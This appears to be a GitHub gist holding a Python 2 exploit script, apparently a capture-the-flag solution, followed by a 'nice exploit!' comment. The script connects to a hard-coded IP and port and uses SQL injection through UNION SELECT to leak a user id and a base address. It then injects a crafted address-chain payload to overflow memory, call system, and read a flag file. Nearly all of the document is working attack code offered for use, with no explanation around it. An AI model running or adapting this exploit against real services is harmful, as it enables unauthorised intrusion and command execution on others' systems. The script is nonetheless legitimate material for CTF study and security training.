import random | |
import socket | |
import string | |
import sys | |
import time | |
from binascii import hexlify | |
from binascii import unhexlify | |
def make_address(offset, address): | |
return unhexlify("%016x" % (offset + address))[::-1] | |
HOST = '88.198.89.199' | |
PORT = 1234 | |
system_address = -0xebace0 | |
# Connect | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((HOST, PORT)) | |
s.settimeout(2) | |
s.recv(1024) | |
# Generate user | |
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)]) | |
# Register | |
s.sendall("register %s %s\n" % (username, username)) | |
s.recv(1024) | |
# Login | |
s.sendall("login %s %s\n" % (username, username)) | |
s.recv(1024) | |
# Leak userid | |
s.sendall("search x' union select id from users where name='%s'#\n" % (username)) | |
s.recv(1024) | |
s.sendall("show 0\n") | |
userid = int(s.recv(1024)[3:]) | |
# print "Userid: %d" % userid | |
# Leak base address | |
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n") | |
s.recv(1024) | |
s.sendall("show 11\n") | |
s.recv(4) | |
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0 | |
# print "Base address: 0x%x" % offset | |
s.recv(1024) | |
# Add dummy value and payload | |
payload = '\x00' * 56 + '\x02' + '\x00' * 7 | |
payload += make_address(offset, 0x223d) | |
payload += make_address(offset, 0x2238) | |
payload += make_address(offset, system_address) | |
payload += make_address(offset, 0x223d) | |
payload = hexlify(payload) | |
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload)) | |
s.recv(1024) | |
# Overflow payload to 0x203d68 | |
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid) | |
s.recv(1024) | |
# Test | |
s.sendall("add cat /home/user/flag\n") | |
print s.recv(1024) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
nice exploit!